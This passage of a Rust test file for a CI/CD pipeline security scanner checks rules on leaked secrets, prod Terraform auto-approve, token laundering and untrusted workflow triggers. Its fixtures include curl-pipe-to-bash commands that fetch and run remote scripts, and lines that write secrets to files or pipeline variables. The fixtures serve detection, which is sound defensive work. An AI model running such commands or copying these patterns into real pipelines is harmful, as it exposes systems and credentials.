"echo \"token = \\\"$(TF_TOKEN)\\\"\" > $(Build.SourcesDirectory)/secrets.tfvars";
let g = build_step_with_script("TF_TOKEN", script);
let findings = secret_materialised_to_workspace_file(&g);
assert_eq!(findings.len(), 1);
}
#[test]
fn echoing_secret_to_stdout_not_flagged_by_materialisation_rule() {
let g = build_step_with_script("TF_TOKEN", "echo using $(TF_TOKEN)\nterraform init");
let findings = secret_materialised_to_workspace_file(&g);
assert!(
findings.is_empty(),
"stdout echo (no file sink) must not trip materialisation rule"
);
}
#[test]
fn write_to_unrelated_path_not_flagged() {
// No workspace-path keyword, no risky extension — should not fire.
let script = "echo $(MY_SECRET) > /var/tmp/ignore.log";
let g = build_step_with_script("MY_SECRET", script);
let findings = secret_materialised_to_workspace_file(&g);
assert!(findings.is_empty());
}
// ── keyvault_secret_to_plaintext ─────────────────────────
#[test]
fn keyvault_asplaintext_flagged() {
let script = "$pass = Get-AzKeyVaultSecret -VaultName foo -Name bar -AsPlainText\n\
Write-Host done";
let g = build_step_with_script("UNUSED", script);
let findings = keyvault_secret_to_plaintext(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Medium);
}
#[test]
fn keyvault_secretvaluetext_legacy_pattern_flagged() {
let script = "$pwd = (Get-AzKeyVaultSecret -VaultName foo -Name bar).SecretValueText";
let g = build_step_with_script("UNUSED", script);
let findings = keyvault_secret_to_plaintext(&g);
assert_eq!(findings.len(), 1);
}
#[test]
fn convertfrom_securestring_asplaintext_flagged() {
let script = "$plain = ConvertFrom-SecureString $sec -AsPlainText";
let g = build_step_with_script("UNUSED", script);
let findings = keyvault_secret_to_plaintext(&g);
assert_eq!(findings.len(), 1);
}
#[test]
fn keyvault_securestring_handling_not_flagged() {
// Using the secret as SecureString (no -AsPlainText) is the safe pattern.
let script = "$sec = Get-AzKeyVaultSecret -VaultName foo -Name bar\n\
$cred = New-Object PSCredential 'svc', $sec.SecretValue";
let g = build_step_with_script("UNUSED", script);
let findings = keyvault_secret_to_plaintext(&g);
assert!(
findings.is_empty(),
"SecureString-only handling is the recommended pattern and must not fire"
);
}
// ── terraform_auto_approve_in_prod ──────────────────────
fn step_with_meta(g: &mut AuthorityGraph, name: &str, meta: &[(&str, &str)]) -> NodeId {
let mut m = std::collections::HashMap::new();
for (k, v) in meta {
m.insert((*k).to_string(), (*v).to_string());
}
g.add_node_with_metadata(NodeKind::Step, name, TrustZone::FirstParty, m)
}
#[test]
fn terraform_auto_approve_against_prod_connection_fires() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
step_with_meta(
&mut g,
"Terraform : Apply",
&[
(META_TERRAFORM_AUTO_APPROVE, "true"),
(META_SERVICE_CONNECTION_NAME, "sharedservice-w365-prod-sc"),
],
);
let findings = terraform_auto_approve_in_prod(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Critical);
assert_eq!(
findings[0].category,
FindingCategory::TerraformAutoApproveInProd
);
assert!(
findings[0].message.contains("sharedservice-w365-prod-sc"),
"message should name the connection, got: {}",
findings[0].message
);
}
#[test]
fn terraform_auto_approve_via_edge_to_service_connection_identity() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
let step = step_with_meta(
&mut g,
"Terraform : Apply",
&[(META_TERRAFORM_AUTO_APPROVE, "true")],
);
let mut id_meta = std::collections::HashMap::new();
id_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
let conn = g.add_node_with_metadata(
NodeKind::Identity,
"alz-infra-sc-prd-uks",
TrustZone::FirstParty,
id_meta,
);
g.add_edge(step, conn, EdgeKind::HasAccessTo);
let findings = terraform_auto_approve_in_prod(&g);
assert_eq!(findings.len(), 1);
assert!(findings[0].message.contains("alz-infra-sc-prd-uks"));
}
#[test]
fn terraform_auto_approve_with_env_gate_downgrades_to_medium() {
// Per blue-team CC-4: env gate is a partial control (the gate's
// approver list is invisible from YAML), so the finding stays
// visible at Medium rather than disappearing entirely.
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
step_with_meta(
&mut g,
"Terraform : Apply",
&[
(META_TERRAFORM_AUTO_APPROVE, "true"),
(META_SERVICE_CONNECTION_NAME, "platform-prod-sc"),
(META_ENV_APPROVAL, "true"),
],
);
let findings = terraform_auto_approve_in_prod(&g);
assert_eq!(
findings.len(),
1,
"env-gated apply must still emit a finding"
);
assert_eq!(
findings[0].severity,
Severity::Medium,
"env-gated apply downgrades Critical → Medium (compensating control credit)"
);
assert!(findings[0]
.message
.contains("`environment:` binding present"));
}
#[test]
fn terraform_auto_approve_against_non_prod_does_not_fire() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
step_with_meta(
&mut g,
"Terraform : Apply",
&[
(META_TERRAFORM_AUTO_APPROVE, "true"),
(META_SERVICE_CONNECTION_NAME, "platform-dev-sc"),
],
);
let findings = terraform_auto_approve_in_prod(&g);
assert!(findings.is_empty(), "dev connection must not match prod");
}
#[test]
fn terraform_apply_without_auto_approve_does_not_fire() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
step_with_meta(
&mut g,
"Terraform : Apply",
&[(META_SERVICE_CONNECTION_NAME, "platform-prod-sc")],
);
let findings = terraform_auto_approve_in_prod(&g);
assert!(findings.is_empty());
}
#[test]
fn looks_like_prod_connection_matches_real_world_names() {
assert!(looks_like_prod_connection("sharedservice-w365-prod-sc"));
assert!(looks_like_prod_connection("alz-infra-sc-prd"));
assert!(looks_like_prod_connection("prod-tenant-arm"));
assert!(looks_like_prod_connection("PROD"));
assert!(looks_like_prod_connection("my_prod_arm"));
// Negatives — substrings inside other words must not match
assert!(!looks_like_prod_connection("approver-sc"));
assert!(!looks_like_prod_connection("reproducer-sc"));
assert!(!looks_like_prod_connection("dev-sc"));
assert!(!looks_like_prod_connection("staging"));
}
// ── addspn_with_inline_script ───────────────────────────
#[test]
fn addspn_with_inline_script_fires_with_basic_body() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
step_with_meta(
&mut g,
"ado : azure : login (federated)",
&[
(META_ADD_SPN_TO_ENV, "true"),
(META_SCRIPT_BODY, "az account show --query id -o tsv"),
],
);
let findings = addspn_with_inline_script(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::High);
assert!(!findings[0]
.message
.contains("explicit token laundering detected"));
}
#[test]
fn addspn_with_inline_script_escalates_message_on_token_laundering() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
step_with_meta(
&mut g,
"ado : azure : login (federated)",
&[
(META_ADD_SPN_TO_ENV, "true"),
(
META_SCRIPT_BODY,
"Write-Output \"##vso[task.setvariable variable=ARM_OIDC_TOKEN]$env:idToken\"",
),
],
);
let findings = addspn_with_inline_script(&g);
assert_eq!(findings.len(), 1);
assert!(
findings[0]
.message
.contains("explicit token laundering detected"),
"message should escalate, got: {}",
findings[0].message
);
}
#[test]
fn addspn_without_inline_script_does_not_fire() {
// No META_SCRIPT_BODY → scriptPath form, not inline
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
step_with_meta(
&mut g,
"AzureCLI scriptPath",
&[(META_ADD_SPN_TO_ENV, "true")],
);
let findings = addspn_with_inline_script(&g);
assert!(findings.is_empty());
}
#[test]
fn inline_script_without_addspn_does_not_fire() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
step_with_meta(
&mut g,
"az account show",
&[(META_SCRIPT_BODY, "az account show")],
);
let findings = addspn_with_inline_script(&g);
assert!(findings.is_empty());
}
#[test]
fn script_launders_spn_token_recognises_known_markers() {
assert!(script_launders_spn_token(
"Write-Output \"##vso[task.setvariable variable=ARM_OIDC_TOKEN]$env:idToken\""
));
assert!(script_launders_spn_token(
"echo \"##vso[task.setvariable variable=X]$env:servicePrincipalKey\""
));
// setvariable without token material → not laundering, just env mutation
assert!(!script_launders_spn_token(
"echo \"##vso[task.setvariable variable=X]hello\""
));
// No setvariable at all
assert!(!script_launders_spn_token("$env:idToken"));
}
// ── parameter_interpolation_into_shell ──────────────────
fn graph_with_param(spec: ParamSpec, name: &str) -> AuthorityGraph {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
g.parameters.insert(name.to_string(), spec);
g
}
#[test]
fn parameter_interpolation_fires_on_free_form_string_in_inline_script() {
let mut g = graph_with_param(
ParamSpec {
param_type: "string".into(),
has_values_allowlist: false,
},
"appName",
);
step_with_meta(
&mut g,
"terraform workspace",
&[(
META_SCRIPT_BODY,
"terraform workspace select -or-create ${{ parameters.appName }}",
)],
);
let findings = parameter_interpolation_into_shell(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Medium);
assert!(findings[0].message.contains("appName"));
}
#[test]
fn parameter_interpolation_with_values_allowlist_does_not_fire() {
let mut g = graph_with_param(
ParamSpec {
param_type: "string".into(),
has_values_allowlist: true,
},
"location",
);
step_with_meta(
&mut g,
"Terraform Plan",
&[(
META_SCRIPT_BODY,
"terraform plan -var=\"location=${{ parameters.location }}\"",
)],
);
let findings = parameter_interpolation_into_shell(&g);
assert!(
findings.is_empty(),
"values: allowlist must suppress the finding"
);
}
#[test]
fn parameter_interpolation_default_type_is_treated_as_string() {
let mut g = graph_with_param(
ParamSpec {
// ADO defaults missing `type:` to string — same risk
param_type: "".into(),
has_values_allowlist: false,
},
"appName",
);
step_with_meta(
&mut g,
"Terraform : Plan",
&[(
META_SCRIPT_BODY,
"terraform plan -var \"appName=${{ parameters.appName }}\"",
)],
);
let findings = parameter_interpolation_into_shell(&g);
assert_eq!(findings.len(), 1, "missing type: must default to string");
}
#[test]
fn parameter_interpolation_skips_non_string_params() {
let mut g = graph_with_param(
ParamSpec {
param_type: "boolean".into(),
has_values_allowlist: false,
},
"enabled",
);
step_with_meta(
&mut g,
"step",
&[(META_SCRIPT_BODY, "echo ${{ parameters.enabled }}")],
);
let findings = parameter_interpolation_into_shell(&g);
assert!(findings.is_empty(), "boolean params can't carry shell");
}
#[test]
fn parameter_interpolation_no_spaces_form_also_matches() {
let mut g = graph_with_param(
ParamSpec {
param_type: "string".into(),
has_values_allowlist: false,
},
"x",
);
step_with_meta(
&mut g,
"step",
&[(META_SCRIPT_BODY, "echo ${{parameters.x}}")],
);
let findings = parameter_interpolation_into_shell(&g);
assert_eq!(findings.len(), 1);
}
#[test]
fn parameter_interpolation_skips_step_without_script_body() {
let mut g = graph_with_param(
ParamSpec {
param_type: "string".into(),
has_values_allowlist: false,
},
"appName",
);
// Step has no META_SCRIPT_BODY (e.g. a typed task without an inline script)
g.add_node(NodeKind::Step, "task-step", TrustZone::Untrusted);
let findings = parameter_interpolation_into_shell(&g);
assert!(findings.is_empty());
}
// ── runtime_script_fetched_from_floating_url ───────────────
fn step_with_body(body: &str) -> AuthorityGraph {
let mut g = AuthorityGraph::new(source("ci.yml"));
let id = g.add_node(NodeKind::Step, "install", TrustZone::FirstParty);
if let Some(node) = g.nodes.get_mut(id) {
node.metadata
.insert(META_SCRIPT_BODY.into(), body.to_string());
}
g
}
#[test]
fn floating_curl_pipe_bash_master_is_flagged() {
let g = step_with_body(
"curl -fsSL https://raw.githubusercontent.com/tilt-dev/tilt/master/scripts/install.sh | bash",
);
let findings = runtime_script_fetched_from_floating_url(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::High);
assert_eq!(
findings[0].category,
FindingCategory::RuntimeScriptFetchedFromFloatingUrl
);
}
#[test]
fn floating_deno_run_main_is_flagged() {
let g = step_with_body(
"deno run https://raw.githubusercontent.com/denoland/deno/refs/heads/main/tools/verify_pr_title.js \"$PR_TITLE\"",
);
let findings = runtime_script_fetched_from_floating_url(&g);
assert_eq!(findings.len(), 1);
}
#[test]
fn pinned_curl_url_with_tag_not_flagged() {
let g = step_with_body(
"curl -fsSL https://raw.githubusercontent.com/tilt-dev/tilt/v0.33.10/scripts/install.sh | bash",
);
let findings = runtime_script_fetched_from_floating_url(&g);
assert!(findings.is_empty(), "tag-pinned URL must not fire");
}
#[test]
fn curl_without_pipe_to_shell_not_flagged() {
// `curl -O` writes to disk; the script isn't executed inline.
let g = step_with_body(
"curl -sSLO https://raw.githubusercontent.com/rust-lang/rust/master/src/tools/linkchecker/linkcheck.sh",
);
let findings = runtime_script_fetched_from_floating_url(&g);
assert!(findings.is_empty(), "download-only must not fire");
}
#[test]
fn bash_process_substitution_curl_main_is_flagged() {
let g = step_with_body(
"bash <(curl -s https://raw.githubusercontent.com/some/repo/main/install.sh)",
);
let findings = runtime_script_fetched_from_floating_url(&g);
assert_eq!(findings.len(), 1);
}
// ── pr_trigger_with_floating_action_ref ────────────────────
fn graph_with_trigger_and_action(trigger: &str, action: &str) -> AuthorityGraph {
let mut g = AuthorityGraph::new(source("pr.yml"));
g.metadata.insert(META_TRIGGER.into(), trigger.into());
g.add_node(NodeKind::Image, action, TrustZone::ThirdParty);
g
}
#[test]
fn pull_request_target_with_floating_main_action_flagged_critical() {
let g = graph_with_trigger_and_action("pull_request_target", "actions/checkout@main");
let findings = pr_trigger_with_floating_action_ref(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Critical);
assert_eq!(
findings[0].category,
FindingCategory::PrTriggerWithFloatingActionRef
);
}
#[test]
fn pull_request_target_with_sha_pinned_action_not_flagged() {
let g = graph_with_trigger_and_action(
"pull_request_target",
"denoland/setup-deno@667a34cdef165d8d2b2e98dde39547c9daac7282",
);
let findings = pr_trigger_with_floating_action_ref(&g);
assert!(findings.is_empty());
}
#[test]
fn issue_comment_with_floating_action_flagged() {
let g = graph_with_trigger_and_action("issue_comment", "foo/bar@v1");
let findings = pr_trigger_with_floating_action_ref(&g);
assert_eq!(findings.len(), 1);
}
#[test]
fn pull_request_only_does_not_trigger_critical_compound_rule() {
// `pull_request` (without `_target`) is the safe trigger — no base
// repo write. Rule 4 must not fire on it.
let g = graph_with_trigger_and_action("pull_request", "foo/bar@main");
let findings = pr_trigger_with_floating_action_ref(&g);
assert!(
findings.is_empty(),
"pull_request alone must not produce a critical compound finding"
);
}
#[test]
fn comma_separated_trigger_with_pull_request_target_flagged() {
let g = graph_with_trigger_and_action(
"pull_request_target,push,workflow_dispatch",
"foo/bar@main",
);
let findings = pr_trigger_with_floating_action_ref(&g);
assert_eq!(findings.len(), 1);
}
// ── untrusted_api_response_to_env_sink ─────────────────────
fn graph_with_trigger_and_step_body(trigger: &str, body: &str) -> AuthorityGraph {
let mut g = AuthorityGraph::new(source("consumer.yml"));
g.metadata.insert(META_TRIGGER.into(), trigger.into());
let id = g.add_node(NodeKind::Step, "capture", TrustZone::FirstParty);
if let Some(node) = g.nodes.get_mut(id) {
node.metadata
.insert(META_SCRIPT_BODY.into(), body.to_string());
}
g
}
#[test]
fn workflow_run_gh_pr_view_to_github_env_flagged() {
let body = "gh pr view --repo \"$REPO\" \"$PR_BRANCH\" --json 'number' --jq '\"PR_NUMBER=\\(.number)\"' >> $GITHUB_ENV";
let g = graph_with_trigger_and_step_body("workflow_run", body);
let findings = untrusted_api_response_to_env_sink(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::High);
}
#[test]
fn workflow_run_without_env_sink_not_flagged() {
let body = "gh pr view --repo \"$REPO\" \"$PR_BRANCH\" --json number";
let g = graph_with_trigger_and_step_body("workflow_run", body);
let findings = untrusted_api_response_to_env_sink(&g);
assert!(findings.is_empty());
}
#[test]
fn push_trigger_writing_to_env_not_flagged() {
// Trigger is not in scope (push isn't a cross-workflow trust boundary)
let body = "gh pr view --json number --jq .number >> $GITHUB_ENV";
let g = graph_with_trigger_and_step_body("push", body);
let findings = untrusted_api_response_to_env_sink(&g);
assert!(findings.is_empty());
}
#[test]
fn workflow_run_multiline_capture_then_write_flagged() {
let body = "VAL=$(gh api repos/foo/bar/pulls/$PR --jq .head.ref)\necho \"BRANCH=$VAL\" >> $GITHUB_ENV";
let g = graph_with_trigger_and_step_body("workflow_run", body);
let findings = untrusted_api_response_to_env_sink(&g);
assert_eq!(findings.len(), 1);
}
// ── pr_build_pushes_image_with_floating_credentials ────────
fn graph_pr_with_login_action(trigger: &str, action: &str) -> AuthorityGraph {
let mut g = AuthorityGraph::new(source("pr-build.yml"));
g.metadata.insert(META_TRIGGER.into(), trigger.into());
g.add_node(NodeKind::Image, action, TrustZone::ThirdParty);
g
}
#[test]
fn pr_with_floating_login_to_gar_flagged() {
let g = graph_pr_with_login_action(
"pull_request",
"grafana/shared-workflows/actions/login-to-gar@main",
);
let findings = pr_build_pushes_image_with_floating_credentials(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::High);
assert_eq!(
findings[0].category,
FindingCategory::PrBuildPushesImageWithFloatingCredentials
);
}
#[test]
fn pr_with_floating_docker_login_action_flagged() {
let g = graph_pr_with_login_action("pull_request", "docker/login-action@v3");
let findings = pr_build_pushes_image_with_floating_credentials(&g);
assert_eq!(findings.len(), 1);
}
#[test]
fn pr_with_sha_pinned_docker_login_not_flagged() {
let g = graph_pr_with_login_action(
"pull_request",
"docker/login-action@343f7c4344506bcbf9b4de18042ae17996df046d",
);
let findings = pr_build_pushes_image_with_floating_credentials(&g);
assert!(findings.is_empty());
}
#[test]
fn push_trigger_with_floating_login_action_not_flagged() {
// Outside PR context — different rule (unpinned_action) covers it.
let g = graph_pr_with_login_action("push", "docker/login-action@v3");
let findings = pr_build_pushes_image_with_floating_credentials(&g);
assert!(findings.is_empty());
}
#[test]
fn pr_with_unrelated_unpinned_action_not_flagged() {
// Rule scopes itself to registry-login actions only; generic actions
// are covered by `unpinned_action` and `pr_trigger_with_floating_action_ref`.
let g = graph_pr_with_login_action("pull_request", "actions/checkout@v4");
let findings = pr_build_pushes_image_with_floating_credentials(&g);
assert!(findings.is_empty());
}
// ── unpinned_action severity tiering ─────────────────────────
#[test]
fn unpinned_action_well_known_first_party_is_medium() {
// `actions/checkout@v4` — owner is the GitHub-maintained `actions`
// org. The supply-chain surface is real but operationally narrow,
// so the rule emits Medium rather than the default High.
let mut g = AuthorityGraph::new(source("ci.yml"));
g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
let findings = unpinned_action(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Medium);
assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
}
#[test]
fn unpinned_action_same_repo_composite_is_info() {
// `./.github/actions/setup` — same-repo composite action. No
// external supply-chain surface, so the rule emits Info as a
// hygiene-only signal rather than a security finding.
let mut g = AuthorityGraph::new(source("ci.yml"));
g.add_node(
NodeKind::Image,
"./.github/actions/setup",
TrustZone::FirstParty,
);
let findings = unpinned_action(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Info);
assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
}
#[test]
fn unpinned_action_unknown_owner_is_high() {
// `random-org/foo@v1` — unknown owner, full unbounded supply-chain
// surface. This is the case the rule was originally designed for
// and the only severity tier that still emits at High.
let mut g = AuthorityGraph::new(source("ci.yml"));
g.add_node(NodeKind::Image, "random-org/foo@v1", TrustZone::Untrusted);
let findings = unpinned_action(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::High);
assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
}
#[test]
fn unpinned_action_self_hosted_runner_label_not_flagged() {
// Self-hosted runner labels are FirstParty Image nodes too — but
// they aren't action references and have no @version to pin. The
// rule must skip them (META_SELF_HOSTED is the marker).
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut meta = std::collections::HashMap::new();
meta.insert(META_SELF_HOSTED.into(), "true".into());
g.add_node_with_metadata(NodeKind::Image, "self-hosted", TrustZone::FirstParty, meta);
let findings = unpinned_action(&g);
assert!(
findings.is_empty(),
"self-hosted runner labels must not be flagged as unpinned actions: {findings:#?}"
);
}
// ── authority_propagation clustering ─────────────────────────
#[test]
fn authority_propagation_clusters_one_secret_to_three_sinks() {
// One secret, three different untrusted sinks reached via separate
// propagation paths. After clustering, the rule must emit ONE
// finding listing all three sinks in `nodes_involved`.
let mut g = AuthorityGraph::new(source("ci.yml"));
let secret = g.add_node(NodeKind::Secret, "GITHUB_TOKEN", TrustZone::FirstParty);
let trampoline = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
let sink_a = g.add_node(NodeKind::Step, "deploy[0]", TrustZone::Untrusted);
let sink_b = g.add_node(NodeKind::Step, "deploy[1]", TrustZone::Untrusted);
let sink_c = g.add_node(NodeKind::Step, "deploy[2]", TrustZone::Untrusted);
g.add_edge(trampoline, secret, EdgeKind::HasAccessTo);
g.add_edge(trampoline, sink_a, EdgeKind::DelegatesTo);
g.add_edge(trampoline, sink_b, EdgeKind::DelegatesTo);
g.add_edge(trampoline, sink_c, EdgeKind::DelegatesTo);
let findings = authority_propagation(&g, 4);
assert_eq!(
findings.len(),
1,
"three propagation paths from one secret must collapse to one finding, got: {findings:#?}"
);
let f = &findings[0];
assert_eq!(f.category, FindingCategory::AuthorityPropagation);
assert_eq!(f.severity, Severity::Critical);
// [source, sink_a, sink_b, sink_c] — order preserved by insertion.
assert_eq!(f.nodes_involved.len(), 4);
assert_eq!(f.nodes_involved[0], secret);
assert!(f.nodes_involved.contains(&sink_a));
assert!(f.nodes_involved.contains(&sink_b));
assert!(f.nodes_involved.contains(&sink_c));
assert!(
f.message.contains("3 sinks")
|| f.message.contains("deploy[0]") && f.message.contains("deploy[2]"),
"cluster message must mention the multiple sinks: {}",
f.message
);
}
#[test]
fn authority_propagation_does_not_cluster_separate_secrets() {
// Three independent secrets, each reaching one sink. The clustering
// is keyed on the source node, so each secret's path becomes its own
// finding — three findings total, not one.
let mut g = AuthorityGraph::new(source("ci.yml"));
let s1 = g.add_node(NodeKind::Secret, "TOKEN_A", TrustZone::FirstParty);
let s2 = g.add_node(NodeKind::Secret, "TOKEN_B", TrustZone::FirstParty);
let s3 = g.add_node(NodeKind::Secret, "TOKEN_C", TrustZone::FirstParty);
let step1 = g.add_node(NodeKind::Step, "step_a", TrustZone::FirstParty);
let step2 = g.add_node(NodeKind::Step, "step_b", TrustZone::FirstParty);
let step3 = g.add_node(NodeKind::Step, "step_c", TrustZone::FirstParty);
let sink1 = g.add_node(NodeKind::Step, "sink_a", TrustZone::Untrusted);
let sink2 = g.add_node(NodeKind::Step, "sink_b", TrustZone::Untrusted);
let sink3 = g.add_node(NodeKind::Step, "sink_c", TrustZone::Untrusted);
g.add_edge(step1, s1, EdgeKind::HasAccessTo);
g.add_edge(step1, sink1, EdgeKind::DelegatesTo);
g.add_edge(step2, s2, EdgeKind::HasAccessTo);
g.add_edge(step2, sink2, EdgeKind::DelegatesTo);
g.add_edge(step3, s3, EdgeKind::HasAccessTo);
g.add_edge(step3, sink3, EdgeKind::DelegatesTo);
let findings = authority_propagation(&g, 4);
assert_eq!(
findings.len(),
3,
"one finding per distinct source secret, got: {findings:#?}"
);
let sources: std::collections::HashSet<_> =
findings.iter().map(|f| f.nodes_involved[0]).collect();
assert!(sources.contains(&s1));
assert!(sources.contains(&s2));
assert!(sources.contains(&s3));
}
// ── secret_via_env_gate_to_untrusted_consumer ──────────────────────
/// Build a graph with one job containing a configurable sequence of
/// steps. Each tuple is (name, trust_zone, writes_env_gate, reads_env,
/// secret_to_link). Returns the graph plus the assigned NodeIds in
/// declaration order so tests can assert on specific nodes.
fn job_with_steps(
job: &str,
steps: &[(&str, TrustZone, bool, bool, Option<&str>)],
) -> (AuthorityGraph, Vec<NodeId>) {
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut secret_ids: std::collections::HashMap<String, NodeId> =
std::collections::HashMap::new();
let mut step_ids = Vec::new();
for (name, zone, writes, reads, secret) in steps {
let mut meta = std::collections::HashMap::new();
meta.insert(META_JOB_NAME.into(), job.into());
if *writes {
meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
}
if *reads {
meta.insert(META_READS_ENV.into(), "true".into());
}
let id = g.add_node_with_metadata(NodeKind::Step, *name, *zone, meta);
if let Some(sname) = secret {
let secret_id = *secret_ids
.entry((*sname).to_string())
.or_insert_with(|| g.add_node(NodeKind::Secret, *sname, TrustZone::FirstParty));
g.add_edge(id, secret_id, EdgeKind::HasAccessTo);
}
step_ids.push(id);
}
(g, step_ids)
}
#[test]
fn env_gate_writer_then_untrusted_reader_fires() {
let (g, _ids) = job_with_steps(
"build",
&[
(
"setup",
TrustZone::FirstParty,
true,
false,
Some("CLOUD_KEY"),
),
("deploy", TrustZone::Untrusted, false, true, None),
],
);
let findings = secret_via_env_gate_to_untrusted_consumer(&g);
assert_eq!(findings.len(), 1, "writer + untrusted reader must fire");
assert_eq!(findings[0].severity, Severity::Critical);
assert!(
findings[0].message.contains("CLOUD_KEY"),
"message must name the laundered secret"
);
assert!(
findings[0].message.contains("deploy"),
"message must name the consumer step"
);
}
#[test]
fn env_gate_writer_then_first_party_reader_does_not_fire() {
// First-party consumer is the legitimate use of $GITHUB_ENV — the
// entire point of the gate. Only flagged when the consumer's trust
// zone is reduced.
let (g, _) = job_with_steps(
"build",
&[
(
"setup",
TrustZone::FirstParty,
true,
false,
Some("CLOUD_KEY"),
),
("use-it", TrustZone::FirstParty, false, true, None),
],
);
let findings = secret_via_env_gate_to_untrusted_consumer(&g);
assert!(
findings.is_empty(),
"first-party reader is the intended use; must not fire"
);
}
#[test]
fn env_gate_write_of_non_secret_value_does_not_fire() {
// Writer step doesn't hold any Secret/Identity — it's writing a
// benign value (build version, config flag) into the env. Out of
// scope: the env gate isn't laundering authority across a trust
// boundary because there's no authority to launder.
let (g, _) = job_with_steps(
"build",
&[
("setup", TrustZone::FirstParty, true, false, None),
("deploy", TrustZone::Untrusted, false, true, None),
],
);
let findings = secret_via_env_gate_to_untrusted_consumer(&g);
assert!(
findings.is_empty(),
"env-gate write of non-authority value must not fire"
);
}
#[test]
fn writer_in_different_job_does_not_fire() {
// The env gate only propagates within a job — a writer in job A
// cannot reach a consumer in job B even if both jobs run on the
// same runner. Same-job constraint enforced via META_JOB_NAME.
let mut g = AuthorityGraph::new(source("ci.yml"));
let secret = g.add_node(NodeKind::Secret, "CLOUD_KEY", TrustZone::FirstParty);
let mut writer_meta = std::collections::HashMap::new();
writer_meta.insert(META_JOB_NAME.into(), "build".into());
writer_meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
let writer =
g.add_node_with_metadata(NodeKind::Step, "setup", TrustZone::FirstParty, writer_meta);
g.add_edge(writer, secret, EdgeKind::HasAccessTo);
let mut consumer_meta = std::collections::HashMap::new();
consumer_meta.insert(META_JOB_NAME.into(), "deploy".into()); // DIFFERENT job
consumer_meta.insert(META_READS_ENV.into(), "true".into());
g.add_node_with_metadata(
NodeKind::Step,
"remote-deploy",
TrustZone::Untrusted,
consumer_meta,
);
let findings = secret_via_env_gate_to_untrusted_consumer(&g);
assert!(
findings.is_empty(),
"cross-job writer/consumer pair must not fire — same-job constraint"
);
}
#[test]
fn writer_after_consumer_in_same_job_does_not_fire() {
// Declaration order matters: a writer that comes AFTER the
// consumer can't have populated the env the consumer read. Without
// this ordering check the rule would over-fire on any same-job
// write/read pair.
let (g, _) = job_with_steps(
"build",
&[
("deploy", TrustZone::Untrusted, false, true, None),
(
"setup",
TrustZone::FirstParty,
true,
false,
Some("CLOUD_KEY"),
),
],
);
let findings = secret_via_env_gate_to_untrusted_consumer(&g);
assert!(
findings.is_empty(),
"writer that runs after the consumer cannot launder into it"
);
}
#[test]
fn third_party_consumer_also_fires() {
// ThirdParty (SHA-pinned marketplace action) is still in scope —
// the action's code is immutable but it can still receive and
// exfiltrate the laundered secret.
let (g, _) = job_with_steps(
"build",
&[
(
"setup",
TrustZone::FirstParty,
true,
false,
Some("CLOUD_KEY"),
),
(
"third-party-deploy",
TrustZone::ThirdParty,
false,
true,
None,
),
],
);
let findings = secret_via_env_gate_to_untrusted_consumer(&g);
assert_eq!(findings.len(), 1);
}
#[test]
fn rule_appears_in_run_all_rules() {
// run_all_rules wires every rule in the catalogue — assert the
// new one is hooked up so it actually fires from the CLI scan path.
let (g, _) = job_with_steps(
"build",
&[
(
"setup",
TrustZone::FirstParty,
true,
false,
Some("CLOUD_KEY"),
),
("deploy", TrustZone::Untrusted, false, true, None),
],
);
let findings = run_all_rules(&g, 4);
assert!(
findings
.iter()
.any(|f| f.category == FindingCategory::SecretViaEnvGateToUntrustedConsumer),
"secret_via_env_gate_to_untrusted_consumer must run via run_all_rules"
);
}
// ── no_workflow_level_permissions_block ──────────────────
fn graph_with_platform(platform: &str, file: &str) -> AuthorityGraph {
let mut g = AuthorityGraph::new(source(file));
g.metadata.insert(META_PLATFORM.into(), platform.into());
g
}
#[test]
fn no_workflow_perms_fires_on_gha_when_marker_present_and_no_token_identity() {
let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
g.metadata
.insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
// A real workflow always has at least one Step. The empty-graph
// guard inside the rule excludes mis-classified variable-only YAML.
g.add_node(NodeKind::Step, "build[0]", TrustZone::FirstParty);
// No GITHUB_TOKEN identity nodes at all (parser would skip creating
// them when there's no permissions block anywhere).
let findings = no_workflow_level_permissions_block(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Medium);
assert_eq!(
findings[0].category,
FindingCategory::NoWorkflowLevelPermissionsBlock
);
}
#[test]
fn no_workflow_perms_does_not_fire_on_empty_graph() {
// Empty graph (variable-only YAML mis-detected as GHA, parse
// failure, etc.) has no real authority surface — must skip.
let mut g = graph_with_platform("github-actions", "vars.yml");
g.metadata
.insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
assert!(no_workflow_level_permissions_block(&g).is_empty());
}
#[test]
